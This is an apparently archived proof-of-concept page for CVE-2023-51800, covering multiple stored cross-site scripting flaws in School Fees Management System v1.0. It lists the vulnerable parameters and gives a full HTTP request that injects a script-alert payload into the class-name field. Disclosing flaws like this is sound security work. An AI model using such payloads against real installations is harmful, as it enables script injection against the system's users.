Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-51800 PoC — School Fees Management System 安全漏洞

Source
Associated Vulnerability
Title:School Fees Management System 安全漏洞 (CVE-2023-51800)
Description:School Fees Management System是一个学费管理系统。 School Fees Management System v.1.0 版本存在安全漏洞。攻击者利用该漏洞执行跨站脚本攻击。
Description
Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.
Readme
# CVE-2023-51800
# School Fees Management System v1.0 - Multiple cross-site scripting (XSS) vulnerabilities

**Description**: Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.  

**Vulnerable Product Version**: School Fees Management System v1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 28/11/2023  
**Confirmed on**: 10/12/2023  
**CVE**: CVE-2023-51800  
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2023-51800  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2023-51800  
**Tenable Link**: https://www.tenable.com/cve/CVE-2023-51800  
**Tested on**: Windows   
### Steps to reproduce:  
To exploit the vulnerability, an authenticated user with the requisite permissions needs to navigate to any of the affected pages and inject a malicious payload into one of the susceptible fields.  
**Affected Components**: 
> main_settings - phone, address, bank, acc_name, acc_number parameters,  
> new_class - cname parameter,  
> add_new_parent - name, email parameters,  
> new_term - tname parameter,  
> edit_student - name parameter  
### Request:  
```
Request:
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close

------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"

<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"

12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--
```
Discoverer(s)/Credits:  
Geraldo Alcântara
File Snapshot

[4.0K] /data/pocs/5740636c9ea50666269ef84593aa92e8a78b4a03 └── [2.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.